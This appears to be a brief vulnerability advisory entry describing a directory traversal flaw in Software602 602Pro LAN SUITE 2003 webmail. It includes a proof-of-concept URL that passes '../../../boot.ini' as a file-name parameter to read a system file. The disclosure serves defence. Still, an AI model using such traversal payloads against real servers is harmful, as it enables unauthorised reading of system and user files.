• info
• discussion
• exploit
• solution
• references

Software602 602Pro LAN SUITE 2003 Directory Traversal Vulnerability

No exploit is required for this vulnerability. The following proof-of-concept has been made available by Phuong Nguyen:

http://www.example.com/mail/m602cl3w.exe?A=GetFile&USER=7921604D7A587937986E24242C0588&DL=0&FN=../../../boot.ini

where USER signifies the current webmail user's username.